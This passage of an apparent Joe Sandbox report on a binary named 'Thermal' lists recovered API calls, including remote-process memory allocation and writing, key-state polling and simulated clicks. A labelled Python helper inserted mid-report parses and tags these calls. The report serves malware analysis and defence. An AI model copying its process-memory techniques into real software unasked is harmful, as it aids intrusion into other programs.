                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                • String ID:
                                                • API String ID: 1389676194-0
                                                • Opcode ID: 9578a087a6c99c0065e0a13a4336a27c129e1dca52c92ed6b569b31ec20c18a4
                                                • Instruction ID: 47745a782b6441182ce65b878c65c152450fbc61f4775fed280ea55ae5c77306
                                                • Opcode Fuzzy Hash: 9578a087a6c99c0065e0a13a4336a27c129e1dca52c92ed6b569b31ec20c18a4
                                                • Instruction Fuzzy Hash: 2F512835A00205DFCF11EF64C989AAEBBF5EF09310B148099E949AB361CB35ED51DF60
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6dbadc64f7c2600c78b54888d38595da08cdf20591d5275fbd8414bf095c7f28
                                                • Instruction ID: 92bca60ad7cb77907a076dcf80ea93111a0ae1c1727fd0e0d5632226ad7d075d
                                                • Opcode Fuzzy Hash: 6dbadc64f7c2600c78b54888d38595da08cdf20591d5275fbd8414bf095c7f28
                                                • Instruction Fuzzy Hash: A741D3B590410CBFD720EB28CC48FB9BBB8EB09350F144165EA1AA73D1D778AD41DA61
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 00772727
                                                • ScreenToClient.USER32(008377B0,?), ref: 00772744
                                                • GetAsyncKeyState.USER32(00000001), ref: 00772769
                                                • GetAsyncKeyState.USER32(00000002), ref: 00772777
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AsyncState$ClientCursorScreen
                                                • String ID:
                                                • API String ID: 4210589936-0
                                                • Opcode ID: 9ad642f810306af1a9b7957b6229bda6f010c19e53f37ed0c350e2cff4d95433
                                                • Instruction ID: e8f32d930b2548c437d3cbf8d47a624c97a02f7c31344c760d40d38e42d3fcc7
                                                • Opcode Fuzzy Hash: 9ad642f810306af1a9b7957b6229bda6f010c19e53f37ed0c350e2cff4d95433
                                                • Instruction Fuzzy Hash: C3418135504109FFDF1A9F68C948AE9BB74FB46364F20831AF93896291CB38AD50DF91
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 007C95E8
                                                • PostMessageW.USER32(?,00000201,00000001), ref: 007C9692
                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007C969A
                                                • PostMessageW.USER32(?,00000202,00000000), ref: 007C96A8
                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007C96B0
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessagePostSleep$RectWindow
                                                • String ID:
                                                • API String ID: 3382505437-0
                                                • Opcode ID: fea025ba6f2b6a22f884fa345ede6e60df05b18e596567a11344623443418159
                                                • Instruction ID: 5892908aa650727d354f0b15a62a7e5e1fb2751d11ade372d6e8100445788e6f
                                                • Opcode Fuzzy Hash: fea025ba6f2b6a22f884fa345ede6e60df05b18e596567a11344623443418159
                                                • Instruction Fuzzy Hash: 4231BA71900219EBDB54CFA8D94CF9E7BB9FB44315F10422DFA24AB2D0C3B49924DB90
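As an added triage aid (example code written for this page, not part of the Joe Sandbox report or its IDA plugin), the script below parses function blocks in the format used above, such as the OpenProcess function at 007EF2F0, the GetAsyncKeyState function at 00772727 and the PostMessageW function at 007C95E8, names the literal Win32 constants the disassembler recovered (0x410 is PROCESS_QUERY_INFORMATION|PROCESS_VM_READ, 0x201 and 0x202 are WM_LBUTTONDOWN and WM_LBUTTONUP, 1 and 2 are VK_LBUTTON and VK_RBUTTON) and tags each function with a behaviour label. The sample input is transcribed from those three blocks; the tag names, the assumed block layout (one "APIs" header per function followed by bullet-prefixed call lines) and the reading of "?" as a statically unknown argument are this example's own assumptions.

```python
"""Triage helper for the per-function "APIs" blocks of a Joe Sandbox report (added example).
Parses lines of the form "• Name.MODULE(arg,...), ref: ADDRESS", names Win32 constants, tags behaviour."""
import re
from typing import List, NamedTuple, Optional, Set

# Constructed sample transcribed from the report: the OpenProcess function at
# 007EF2F0, the GetAsyncKeyState function at 00772727 and the PostMessageW one at 007C95E8.
SAMPLE_BLOCKS = """\
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007EF2F0
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 007EF320
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007EF453
• CloseHandle.KERNEL32(?), ref: 007EF4D4
APIs
• GetCursorPos.USER32(?), ref: 00772727
• ScreenToClient.USER32(008377B0,?), ref: 00772744
• GetAsyncKeyState.USER32(00000001), ref: 00772769
• GetAsyncKeyState.USER32(00000002), ref: 00772777
APIs
• GetWindowRect.USER32(?,?), ref: 007C95E8
• PostMessageW.USER32(?,00000201,00000001), ref: 007C9692
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007C969A
• PostMessageW.USER32(?,00000202,00000000), ref: 007C96A8
"""

# "Part of subcall function X:" lines are accepted too; CRT calls carry no parentheses.
CALL_RE = re.compile(r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(?P<name>\w+)\."
                     r"(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# Standard winnt.h / winuser.h values, only those needed to read the sample.
PROCESS_RIGHTS = {0x1: "PROCESS_TERMINATE", 0x8: "PROCESS_VM_OPERATION", 0x10: "PROCESS_VM_READ",
                  0x20: "PROCESS_VM_WRITE", 0x400: "PROCESS_QUERY_INFORMATION"}
WINDOW_MSGS = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP", 0x201: "WM_LBUTTONDOWN",
               0x202: "WM_LBUTTONUP", 0x204: "WM_RBUTTONDOWN", 0x205: "WM_RBUTTONUP"}
VKEYS = {0x1: "VK_LBUTTON", 0x2: "VK_RBUTTON", 0x4: "VK_MBUTTON"}


class Call(NamedTuple):
    name: str
    module: str
    args: List[Optional[int]]  # None where the report prints '?' (not recovered statically)
    ref: int


def parse_arg(tok: str) -> Optional[int]:
    """Hex argument as the report prints it; '?' is unknown, a leading '-' is negative."""
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    return -int(tok[1:], 16) if tok.startswith("-") else int(tok, 16)


def parse_blocks(text: str) -> List[List[Call]]:
    """Split the text at each 'APIs' header and collect the call lines beneath it."""
    funcs: List[List[Call]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            funcs.append([])
        elif funcs and (m := CALL_RE.match(line)):
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] is not None else []
            funcs[-1].append(Call(m["name"], m["module"], args, int(m["ref"], 16)))
    return funcs


def decode_constant(api: str, index: int, value: Optional[int]) -> Optional[str]:
    """Name the Win32 constant passed as argument `index` of `api`, when it is one we know."""
    if value is None:
        return None
    if api == "OpenProcess" and index == 0:  # access mask: decompose into individual rights
        names = [n for bit, n in sorted(PROCESS_RIGHTS.items()) if value & bit]
        extra = value & ~sum(PROCESS_RIGHTS)
        return "|".join(names + ([f"0x{extra:X}"] if extra else []))
    if api.startswith(("PostMessage", "SendMessage")) and index == 1:
        return WINDOW_MSGS.get(value)
    if api in ("GetAsyncKeyState", "GetKeyState") and index == 0:
        return VKEYS.get(value)
    return None


def classify(calls: List[Call]) -> Set[str]:
    """Behaviour tags (this example's own labels) from API names and decoded constants."""
    names = {c.name for c in calls}
    tags: Set[str] = set()
    if "OpenProcess" in names and names & {"GetProcessMemoryInfo", "GetProcessIoCounters"}:
        tags.add("process-inspection")  # query/read rights only; no VM_WRITE, so not injection
    if names & {"GetAsyncKeyState", "GetKeyState"}:
        tags.add("input-polling")  # reads button/key state without installing a hook
    for c in calls:
        msg = decode_constant(c.name, 1, c.args[1]) if len(c.args) > 1 else None
        if msg and msg.startswith(("WM_LBUTTON", "WM_RBUTTON")):
            tags.add("synthetic-click")  # click injected by posting button messages to a window
    return tags


def triage(text: str) -> List[dict]:
    """One summary row per function: API names, decoded constants and tags."""
    rows = []
    for calls in parse_blocks(text):
        consts = [f"{c.name}({d})" for c in calls
                  for i, a in enumerate(c.args) if (d := decode_constant(c.name, i, a))]
        rows.append({"apis": [c.name for c in calls], "constants": consts,
                     "tags": sorted(classify(calls))})
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_BLOCKS):
        print(row)
```

Run as a script it prints one row per function. The tags are deliberately coarse: "synthetic-click" fires for an automation runtime's control-click routine exactly as it would for remote-control tooling, and the OpenProcess mask in the first block (PROCESS_QUERY_INFORMATION|PROCESS_VM_READ, with neither PROCESS_VM_WRITE nor PROCESS_VM_OPERATION) is consistent with statistics collection rather than code injection. Weight the tags against the report's dynamic findings rather than treating any single function as a verdict.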
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007FB804
                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007FB829
                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007FB841
                                                • GetSystemMetrics.USER32(00000004), ref: 007FB86A
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007E155C,00000000), ref: 007FB888
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$Long$MetricsSystem
                                                • String ID:
                                                • API String ID: 2294984445-0
                                                • Opcode ID: 11f751f926baba71cfc9827e319ada53f22db4f2f4fdfbf733db8101297da548
                                                • Instruction ID: 9b86ee0cecf869ae599425cc22f00192ac2024e6f30c1b3decba143642f41b4a
                                                • Opcode Fuzzy Hash: 11f751f926baba71cfc9827e319ada53f22db4f2f4fdfbf733db8101297da548
                                                • Instruction Fuzzy Hash: CF216D71914259AFCB249F39CC08B7A3BA8FB85765F244A39FA25D62E0D7349850CAD0
                                                APIs
                                                • IsWindow.USER32(00000000), ref: 007E6159
                                                • GetForegroundWindow.USER32 ref: 007E6170
                                                • GetDC.USER32(00000000), ref: 007E61AC
                                                • GetPixel.GDI32(00000000,?,00000003), ref: 007E61B8
                                                • ReleaseDC.USER32(00000000,00000003), ref: 007E61F3
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$ForegroundPixelRelease
                                                • String ID:
                                                • API String ID: 4156661090-0
                                                • Opcode ID: 06c70c26dabe0965ed42b5271a7db5c5b2f30756c857b1d6715c0c68b7fded63
                                                • Instruction ID: 15e9e7b1a5a9c069b15e0281eefd54dcd1515c12b11034e825e7ae33b7cbc6c8
                                                • Opcode Fuzzy Hash: 06c70c26dabe0965ed42b5271a7db5c5b2f30756c857b1d6715c0c68b7fded63
                                                • Instruction Fuzzy Hash: 3F21A175A01604EFD750EF65DC88A9ABBF9FF98350F04C469E94A97352CB75AC00CB90
                                                APIs
                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00771729
                                                • SelectObject.GDI32(?,00000000), ref: 00771738
                                                • BeginPath.GDI32(?), ref: 0077174F
                                                • SelectObject.GDI32(?,00000000), ref: 00771778
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ObjectSelect$BeginCreatePath
                                                • String ID:
                                                • API String ID: 3225163088-0
                                                • Opcode ID: 24fe5b5bc044cdd3044ce212e21f3a395a280e080c87256f43f3c79e451a3f67
                                                • Instruction ID: 9429f1ab8a6347212ab68bf481b2696333898261f81490ac39232036a3ea0a27
                                                • Opcode Fuzzy Hash: 24fe5b5bc044cdd3044ce212e21f3a395a280e080c87256f43f3c79e451a3f67
                                                • Instruction Fuzzy Hash: F821C5B0904208EFDF209F28DC48B697BF8F780351F548626F929A61A0D779D991CF94
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID:
                                                • API String ID: 2931989736-0
                                                • Opcode ID: b0fd1145f580979a4e17b44b8bd0f0e5f395ffae62c85c97fee3d2af7ecebcfb
                                                • Instruction ID: adf7c88f33eeb03e156fc8002fc089dcfa2d5a6954861951d825b8a567731332
                                                • Opcode Fuzzy Hash: b0fd1145f580979a4e17b44b8bd0f0e5f395ffae62c85c97fee3d2af7ecebcfb
                                                • Instruction Fuzzy Hash: F501F963A442057BE612A1105C46FB7739CEF20354F04402DFE1AD6341FB5CDE1082E0
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 007D5075
                                                • __beginthreadex.LIBCMT ref: 007D5093
                                                • MessageBoxW.USER32(?,?,?,?), ref: 007D50A8
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007D50BE
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007D50C5
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                • String ID:
                                                • API String ID: 3824534824-0
                                                • Opcode ID: 27928953800677d86a74f307dcbc1162d14cfbadce48f1526ff2be7072fb5580
                                                • Instruction ID: 4038795740d86ca5367c1dc341a0d9e8b8af105537c26de3ea5256e0d8e3ebe4
                                                • Opcode Fuzzy Hash: 27928953800677d86a74f307dcbc1162d14cfbadce48f1526ff2be7072fb5580
                                                • Instruction Fuzzy Hash: FD1104B2908708BBCB518BA89C08B9B7BBDBB85321F14425AF915D3360D675C9448BF0
                                                APIs
                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C8E3C
                                                • GetLastError.KERNEL32(?,007C8900,?,?,?), ref: 007C8E46
                                                • GetProcessHeap.KERNEL32(00000008,?,?,007C8900,?,?,?), ref: 007C8E55
                                                • HeapAlloc.KERNEL32(00000000,?,007C8900,?,?,?), ref: 007C8E5C
                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C8E73
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 842720411-0
                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D581B
                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007D5829
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5831
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007D583B
                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5877
                                                Similarity
                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                • String ID:
                                                • API String ID: 2833360925-0
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007C8CDE
                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007C8CE8
                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007C8CF7
                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007C8CFE
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007C8D14
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007C8D3F
                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D49
                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D58
                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D5F
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D75
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 007CCD90
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 007CCDA7
                                                • MessageBeep.USER32(00000000), ref: 007CCDBF
                                                • KillTimer.USER32(?,0000040A), ref: 007CCDDB
                                                • EndDialog.USER32(?,00000001), ref: 007CCDF5
                                                Similarity
                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                • String ID:
                                                • API String ID: 3741023627-0
                                                APIs
                                                • EndPath.GDI32(?), ref: 0077179B
                                                • StrokeAndFillPath.GDI32(?,?,007ABBC9,00000000,?), ref: 007717B7
                                                • SelectObject.GDI32(?,00000000), ref: 007717CA
                                                • DeleteObject.GDI32 ref: 007717DD
                                                • StrokePath.GDI32(?), ref: 007717F8
                                                Similarity
                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                • String ID:
                                                • API String ID: 2625713937-0
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 007DCA75
                                                • CoCreateInstance.OLE32(00803D3C,00000000,00000001,00803BAC,?), ref: 007DCA8D
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                • CoUninitialize.OLE32 ref: 007DCCFA
                                                Strings
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                • String ID: .lnk
                                                • API String ID: 2683427295-24824748
                                                APIs
                                                  • Part of subcall function 00790FE6: std::exception::exception.LIBCMT ref: 0079101C
                                                  • Part of subcall function 00790FE6: __CxxThrowException@8.LIBCMT ref: 00791031
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 00781680: _memmove.LIBCMT ref: 007816DB
                                                • __swprintf.LIBCMT ref: 0077E598
                                                Strings
                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0077E431
                                                Similarity
                                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                • API String ID: 1943609520-557222456
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 007952CD
                                                  • Part of subcall function 007A0320: __87except.LIBCMT ref: 007A035B
                                                Strings
                                                Similarity
                                                • API ID: ErrorHandling__87except__start
                                                • String ID: pow
                                                • API String ID: 2905807303-2276729525
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: #$+
                                                • API String ID: 0-2552117581
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: _memmove$_free
                                                • String ID: #Vx
                                                • API String ID: 2620147621-2004165239
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: _memset$_memmove
                                                • String ID: ERCP
                                                • API String ID: 2532777613-1384759551
                                                APIs
                                                  • Part of subcall function 007D1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C9E4E,?,?,00000034,00000800,?,00000034), ref: 007D1CE5
                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007CA3F7
                                                  • Part of subcall function 007D1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 007D1CB0
                                                  • Part of subcall function 007D1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 007D1C08
                                                  • Part of subcall function 007D1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007C9E12,00000034,?,?,00001004,00000000,00000000), ref: 007D1C18
                                                  • Part of subcall function 007D1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007C9E12,00000034,?,?,00001004,00000000,00000000), ref: 007D1C2E
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007CA464
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007CA4B1
                                                Strings
                                                Similarity
                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                • String ID: @
                                                • API String ID: 4150878124-2766056989
                                                • Opcode ID: 199dee96d8d1bd405df6f889e44c5a079805cd121c6fa7aa4f2786b179002c6d
                                                • Instruction ID: 8f1f16c0b0b24227ae75922174f510a81c5ae0b95b8b47763115278a4b9c06e1
                                                • Opcode Fuzzy Hash: 199dee96d8d1bd405df6f889e44c5a079805cd121c6fa7aa4f2786b179002c6d
                                                • Instruction Fuzzy Hash: 4A412B7294021CBFDB14DBA4CD89FDEBBB8AF45300F004199FA55A7280DA756E45CBA1
                                                APIs
                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007F7A86
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007F7A9A
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 007F7ABE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: SysMonthCal32
                                                • API String ID: 2326795674-1439706946
                                                • Opcode ID: a2a4274df0e3d9348bb86919dc5af231db6a719cd860f0f1c37bfb7b23197bb3
                                                • Instruction ID: 7f8ef58e1ae858985d48ba11ee2c6257df6cda74602b03b2eaea8800f96715a4
                                                • Opcode Fuzzy Hash: a2a4274df0e3d9348bb86919dc5af231db6a719cd860f0f1c37bfb7b23197bb3
                                                • Instruction Fuzzy Hash: 7321803261021DABDF158E54CC86FEE3B69EB48714F124214FF156B290DA75A851DBA0
                                                APIs
                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007F826F
                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007F827D
                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007F8284
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
